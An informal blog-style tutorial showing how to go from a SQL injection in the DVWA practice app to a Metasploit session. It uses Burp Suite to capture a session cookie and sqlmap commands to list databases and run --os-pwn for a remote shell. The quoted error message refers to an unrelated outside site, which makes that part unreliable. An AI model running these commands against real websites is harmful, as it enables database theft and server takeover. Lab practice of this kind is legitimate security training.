Wassap people i am him the one and only laughing man back with ye another post this one on sql injection to metasploit session I know most you thinking laughing man you talking shit well sorry lads I’m not metasploit framework has many uses not just for payloads the can do almost anything from recon to exploiting so for this iv set up a lad with dvwa so lets start lads
What is sql injection
SQL injection is a code injection technique that might destroy your database.
SQL injection is one of the most common web hacking techniques.
SQL injection is the placement of malicious code in SQL statements, via web page input.
what is Metasploit Framework
The Metasploit Framework is a Ruby-based, modular penetration testing platform that enables you to write, test, and execute exploit code. The Metasploit Framework contains a suite of tools that you can use to test security vulnerabilities, enumerate networks, execute attacks, and evade detection. At its core, the Metasploit Framework is a collection of commonly used tools that provide a complete environment for penetration testing and exploit development.
What is Dvwa
DVWA is a DAMM VULNERABLE WEB APP coded in PHP/MYSQL. Seriously it is too vulnerable. In this app security professionals, ethical hackers test their skills and run this tools in a legal environment. It also helps web developer better understand the processes of securing web applications and teacher/students to teach/learn web application security in a safe environment.
The aim of DVWA is to practice some of the most common web vulnerability, with various difficulties levels.
what is burp suite
Burp Suite is a Java based Web Penetration Testing framework. It has become an industry standard suite of tools used by information security professionals. Burp Suite helps you identify vulnerabilities and verify attack vectors that are affecting web applications.
Find out more here
What is sqlmap
sqlmap is an open source software that is used to detect and exploit database vulnerabilities and provides options for injecting malicious codes into them. It is a penetration testing tool that automates the process of detecting and exploiting SQL injection flaws providing its user interface in the terminal.
Find out more here
How to preform the attack
first of all we get a are target this my target
http://192.168.8.101/DVWA/vulnerabilities/sqli//DVWA/vulnerabilities/sqli/?id=1&Submit=Submit# now i have my target i can check is it vulnerable to sql injection so what we do is put a ‘ right after the 1 in the url so the url looks like this
once you see this
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ”1”’ at line 1 message when you add the ‘ at the end the of the url for example
as u see in this image when we add the ‘ at the end the url it tells us theres a error ”
Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /nfs/c05/h02/mnt/83231/domains/asfaa.org/html/members.php on line 67″
when we get this error we can use tools like sqlmap , burp suite etc
Now we need to set up the burpsute proxy’s in firefox so type about:preferences in to the url bar in firefox to get the settings scroll down to network
and the proxy for burp suite
now we load up burp suite open the terminal type burp suite or go to the top left of the screen to applications and to web applications analysis and click burp suite
now when we add the ‘ to the url burp suite will pop up
The cookie we need is Cookie: security=low; security=low; PHPSESSID=4kaa6819siab01k545959q45v0
now we open a new terminal and type
sqlmap -u 192.168.8.101/DVWA/vulnerabilities/sqli/ --data="id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=4kaa6819siab01k545959q45v0" --dbs
now we type
sqlmap -u 192.168.8.101/DVWA/vulnerabilities/sqli/ --data="id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=4kaa6819siab01k545959q45v0" --msf-path=/usr/share/metasploit-framework/ --os-pwn --tmp-path="C:/Docments and settings/Administrator/Local Settings/Temp"
now we pick the payload i mostly pick php
this will add the payload to the site and inject it to the browser of the views
show the proof it was connected
there ya have it lads and gals how to use sqlmap to get a metasploit session dont use this for the wrong reasons hacking is agen the law unless you have consent of owner